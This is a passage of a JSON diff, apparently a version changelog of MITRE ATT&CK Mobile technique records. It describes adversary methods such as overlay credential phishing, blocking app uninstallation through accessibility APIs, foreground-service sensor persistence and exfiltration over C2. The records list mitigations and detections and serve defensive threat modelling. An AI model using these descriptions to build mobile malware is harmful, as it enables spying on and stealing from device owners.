+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.626000+00:00\", \"old_value\": \"2025-10-24 17:48:38.977000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0701: Detection of Exfiltration Over Unencrypted Non-C2 Protocol"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-04-01 15:43:45.913000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Exfiltration Over C2 Channel",
+                    "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "exfiltration"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1646",
+                            "external_id": "T1646"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html",
+                            "external_id": "APP-29"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2025-10-24 17:48:36.720000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0615: Detection of Exfiltration Over C2 Channel"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-10-25 14:48:21.965000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "File and Directory Discovery",
+                    "description": "Adversaries may enumerate files and directories or search in specific device locations for desired information within a filesystem. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1420) during automated discovery to shape follow-on behaviors, including deciding if the adversary should fully infect the target and/or attempt specific actions. \n\nOn Android, Linux file permissions and SELinux policies typically stringently restrict what can be accessed by apps without taking advantage of a privilege escalation exploit. The contents of the external storage directory are generally visible, which could present concerns if sensitive data is inappropriately stored there. iOS's security architecture generally restricts the ability to perform any type of [File and Directory Discovery](https://attack.mitre.org/techniques/T1420) without use of escalated privileges. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1420",
+                            "external_id": "T1420"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-41.html",
+                            "external_id": "STA-41"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2025-10-24 17:49:24.899000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1006: Use Recent OS Version"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0682: Detection of File and Directory Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-11-19 17:32:20.373000+00:00",
+                    "modified": "2026-05-12 15:12:00.636000+00:00",
+                    "name": "Foreground Persistence",
+                    "description": "Adversaries may abuse Android's `startForeground()` API method to maintain continuous sensor access. Beginning in Android 9, idle applications running in the background no longer have access to device sensors, such as the camera, microphone, and gyroscope.(Citation: Android-SensorsOverview) Applications can retain sensor access by running in the foreground, using Android\u2019s `startForeground()` API method. This informs the system that the user is actively interacting with the application, and it should not be killed. The only requirement to start a foreground service is showing a persistent notification to the user.(Citation: Android-ForegroundServices)\n\nMalicious applications may abuse the `startForeground()` API method to continue running in the foreground, while presenting a notification to the user pretending to be a genuine application. This would allow unhindered access to the device\u2019s sensors, assuming permission has been previously granted.(Citation: BlackHat Sutter Android Foreground 2019)\n\nMalicious applications may also abuse the `startForeground()` API to inform the Android system that the user is actively interacting with the application, thus preventing it from being killed by the low memory killer.(Citation: TrendMicro-Yellow Camera)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "defense-evasion"
+                        },
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1541",
+                            "external_id": "T1541"
+                        },
+                        {
+                            "source_name": "Android-SensorsOverview",
+                            "description": "Google. (n.d.). Sensors Overview. Retrieved November 19, 2019.",
+                            "url": "https://developer.android.com/guide/topics/sensors/sensors_overview#sensors-practices"
+                        },
+                        {
+                            "source_name": "Android-ForegroundServices",
+                            "description": "Google. (n.d.). Services overview. Retrieved November 19, 2019.",
+                            "url": "https://developer.android.com/guide/components/services.html#Foreground"
+                        },
+                        {
+                            "source_name": "TrendMicro-Yellow Camera",
+                            "description": "Song Wang. (2019, October 18). Fake Photo Beautification Apps on Google Play can Read SMS Verification Code to Trigger Wireless Application Protocol (WAP)/Carrier Billing. Retrieved November 19, 2019.",
+                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/fake-photo-beautification-apps-on-google-play-can-read-sms-verification-code-to-trigger-wireless-application-protocol-wap-carrier-billing/"
+                        },
+                        {
+                            "source_name": "BlackHat Sutter Android Foreground 2019",
+                            "description": "Thomas Sutter. (2019, December). Simple Spyware Androids Invisible Foreground Services and How to (Ab)use Them. Retrieved December 26, 2019.",
+                            "url": "https://i.blackhat.com/eu-19/Thursday/eu-19-Sutter-Simple-Spyware-Androids-Invisible-Foreground-Services-And-How-To-Abuse-Them.pdf"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html",
+                            "external_id": "APP-19"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Lorin Wu, Trend Micro"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "2.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.636000+00:00\", \"old_value\": \"2025-10-24 17:48:52.197000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0637: Detection of Foreground Persistence"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-04-11 20:05:56.069000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "User Evasion",
+                    "description": "Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary\u2019s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device. \n\nWhile there are many ways this can be accomplished, one method is by using the device\u2019s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "defense-evasion"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1628/002",
+                            "external_id": "T1628.002"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2025-10-24 17:48:32.337000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1010: Deploy Compromised Device Detection Method"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0699: Detection of User Evasion"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-04-01 18:44:32.808000+00:00",
+                    "modified": "2026-05-12 15:12:00.721000+00:00",
+                    "name": "Prevent Application Removal",
+                    "description": "Adversaries may abuse the Android device administration API to prevent the user from uninstalling a target application. In earlier versions of Android, device administrator applications needed their administration capabilities explicitly deactivated by the user before the application could be uninstalled. This was later updated so the user could deactivate and uninstall the administrator application in one step.\n\nAdversaries may also abuse the device accessibility APIs to prevent removal. This set of APIs allows the application to perform certain actions on behalf of the user and programmatically determine what is being shown on the screen. The malicious application could monitor the device screen for certain modals (e.g., the confirmation modal to uninstall an application) and inject screen input or a back button tap to close the modal. For example, Android's `performGlobalAction(int)` API could be utilized to prevent the user from removing the malicious application from the device after installation. If the user wants to uninstall the malicious application, two cases may occur, both preventing the user from removing the application.\n\n* Case 1: If the integer argument passed to the API call is `2` or `GLOBAL_ACTION_HOME`, the malicious application may direct the user to the home screen from settings screen \n\n* Case 2: If the integer argument passed to the API call is `1` or `GLOBAL_ACTION_BACK`, the malicious application may emulate the back press event ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "defense-evasion"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1629/001",
+                            "external_id": "T1629.001"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html",
+                            "external_id": "APP-22"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Shankar Raman, Gen Digital and Abhinand, Amrita University"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.721000+00:00\", \"old_value\": \"2025-10-24 17:49:28.687000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1006: Use Recent OS Version",
+                            "M1011: User Guidance",
+                            "M1012: Enterprise Policy"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0598: Detection of Prevent Application Removal"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-03-30 19:36:09.691000+00:00",
+                    "modified": "2026-05-12 15:12:00.707000+00:00",
+                    "name": "File Deletion",
+                    "description": "Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location.(Citation: Android DevicePolicyManager 2019) \n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The impact file deletion will have depends on the type of data as well as the goals and objectives of the adversary, but can include deleting update files to evade detection or deleting attacker-specified files for impact.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "defense-evasion"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1630/002",
+                            "external_id": "T1630.002"
+                        },
+                        {
+                            "source_name": "Android DevicePolicyManager 2019",
+                            "description": "Android Developers. (n.d.). DevicePolicyManager. Retrieved September 22, 2019.",
+                            "url": "https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.707000+00:00\", \"old_value\": \"2025-10-24 17:49:12.849000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0638: Detection of File Deletion"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-03-30 19:31:31.855000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Uninstall Malicious Application",
+                    "description": "Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by: \n \n* Abusing device owner permissions to perform silent uninstallation using device owner API calls. \n* Abusing root permissions to delete files from the filesystem. \n* Abusing the accessibility service. This requires sending an intent to the system to request uninstallation, and then abusing the accessibility service to click the proper places on the screen to confirm uninstallation.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "defense-evasion"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1630/001",
+                            "external_id": "T1630.001"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html",
+                            "external_id": "APP-43"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2025-10-24 17:48:23.278000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1001: Security Updates",
+                            "M1002: Attestation",
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0690: Detection of Uninstall Malicious Application"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-21 15:27:30.182000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "Ingress Tool Transfer",
+                    "description": "Adversaries may transfer tools or other files from an external system onto a compromised device to facilitate follow-on actions. Files may be copied from an external adversary-controlled system through the command and control channel  or through alternate protocols with another tool such as FTP.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1544",
+                            "external_id": "T1544"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "2.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2025-10-24 17:48:34.355000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.2",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0718: Detection of Ingress Tool Transfer"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-04-05 19:48:31.195000+00:00",
+                    "modified": "2026-05-12 15:12:00.630000+00:00",
+                    "name": "GUI Input Capture",
+                    "description": "Adversaries may mimic common operating system GUI components to prompt users for sensitive information with a seemingly legitimate prompt. The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique\u2019s use.(Citation: Felt-PhishingOnMobileDevices)\n\nThere are several approaches adversaries may use to mimic this functionality. Adversaries may impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and, when installed on the device, may prompt the user for sensitive information.(Citation: eset-finance) Adversaries may also send fake device notifications to the user that may trigger the display of an input prompt when clicked.(Citation: Group IB Gustuff Mar 2019) \n\nAdditionally, adversaries may display a prompt on top of a running, legitimate application to trick users into entering sensitive information into a malicious application rather than the legitimate application. Typically, adversaries need to know when the targeted application and the individual activity within the targeted application is running in the foreground to display the prompt at the proper time. Adversaries can abuse Android\u2019s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Two known approaches to displaying a prompt include:\n\n* Adversaries start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background)\n* Adversaries create an application overlay window on top of a running legitimate application. Applications must hold the `SYSTEM_ALERT_WINDOW` permission to create overlay windows. This permission is handled differently than typical Android permissions and, at least under certain conditions, is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The `SYSTEM_ALERT_WINDOW` permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "credential-access"
+                        },
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1417/002",
+                            "external_id": "T1417.002"
+                        },
+                        {
+                            "source_name": "Felt-PhishingOnMobileDevices",
+                            "description": "A.P. Felt and D. Wagner. (2011, May 26). Phishing on Mobile Devices. Retrieved August 25, 2016.",
+                            "url": "http://w2spconf.com/2011/papers/felt-mobilephishing.pdf"
+                        },
+                        {
+                            "source_name": "Android Background",
+                            "description": "Android Developers. (n.d.). Restrictions on starting activities from the background. Retrieved September 18, 2019.",
+                            "url": "https://developer.android.com/guide/components/activities/background-starts"
+                        },
+                        {
+                            "source_name": "Cloak and Dagger",
+                            "description": "Fratantonio, Y., et al.. (2017). Cloak & Dagger. Retrieved September 12, 2024.",
+                            "url": "https://cloak-and-dagger.org/"
+                        },
+                        {
+                            "source_name": "Group IB Gustuff Mar 2019",
+                            "description": "Group-IB. (2019, March 28). Group-IB uncovers Android Trojan named \u00abGustuff\u00bb capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. Retrieved September 3, 2019.",
+                            "url": "https://www.group-ib.com/blog/gustuff"
+                        },
+                        {
+                            "source_name": "eset-finance",
+                            "description": "Luk\u00e1\u0161 \u0160tefanko. (2016, July 7). Fake finance apps on Google Play target users from around the world. Retrieved September 24, 2018.",
+                            "url": "https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/"
+                        },
+                        {
+                            "source_name": "Hassell-ExploitingAndroid",
+                            "description": "R. Hassell. (2011, October 12-13). Exploiting Androids for Fun and Profit. Retrieved October 10, 2019.",
+                            "url": "https://conference.hitb.org/hitbsecconf2011kul/materials/D1T1%20-%20Riley%20Hassell%20-%20Exploiting%20Androids%20for%20Fun%20and%20Profit.pdf"
+                        },
+                        {
+                            "source_name": "XDA Bubbles",
+                            "description": "Rahman, M.. (2019, May 8). Bubbles in Android Q will fully replace the overlay API in a future Android version. Retrieved September 18, 2019.",
+                            "url": "https://www.xda-developers.com/android-q-system-alert-window-deprecate-bubbles/"
+                        },
+                        {
+                            "source_name": "NowSecure Android Overlay",
+                            "description": "Ramirez, T.. (2017, May 25). \u2018SAW\u2019-ing through the UI: Android overlay malware and the System Alert Window permission explained. Retrieved September 18, 2019.",
+                            "url": "https://www.nowsecure.com/blog/2017/05/25/android-overlay-malware-system-alert-window-permission/"
+                        },
+                        {
+                            "source_name": "ThreatFabric Cerberus",
+                            "description": "ThreatFabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved September 18, 2019.",
+                            "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html"
+                        },
+                        {
+                            "source_name": "Skycure-Accessibility",
+                            "description": "Yair Amit. (2016, March 3). \u201cAccessibility Clickjacking\u201d \u2013 The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20170211204349/https://www.skycure.com/blog/accessibility-clickjacking/"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html",
+                            "external_id": "APP-31"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
